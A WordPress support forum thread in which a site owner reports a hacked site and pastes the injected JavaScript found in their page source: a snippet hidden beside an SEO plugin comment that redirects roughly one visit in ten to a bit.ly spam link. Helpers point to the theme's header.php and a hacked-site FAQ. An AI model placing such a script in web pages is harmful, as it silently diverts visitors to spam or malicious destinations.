[Resolved] Domain Hacked and Redirected

  • Hi everyone,

    Can someone help me to sort out the redirect spam,

    I tried using: http://redleg-redleg.com/file-viewer/ to find out where exactly the redirect link is stored.

    It is stored as:

    35: < !-- /all in one seo pack pro Version-- >
    36: < script type="text/javascript" >
    37: var now = new Date().getTime();
    38: if (now%10 == 0) {
    39: window.location = "http://bit.ly/tNvDL8";
    40: }
    41: < / script >
    42: < !-- Theme version -- >

    http://bit.ly/tNvDL8 is the redirect spam.

    Please let me know how to remove this.

    Best Regards,

  • That looks like it will be in header.php on your theme folder. Without a URL, we can not really check where exactly.

    This URL will help on the steps you should do next: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Hi Snat,

    Thanks for the support. My site is: iamembedded.com

    I just checked opening the site in my friend’s computer and it worked without any redirects. However, redirects happen in my system. I use Avast Internet Security and it says ‘no threats detected’ after the scan.

    It would great if you can let me know if my site is really affected by the redirects, and if it is, how to remove.

    Thank You.

    Best Regards,

    It did not redirect on mine. You would be wise to check as many browsers you can. I was using Google Chrome when I clicked it, and not in a position to try others sadly.

    Thanks Snat.
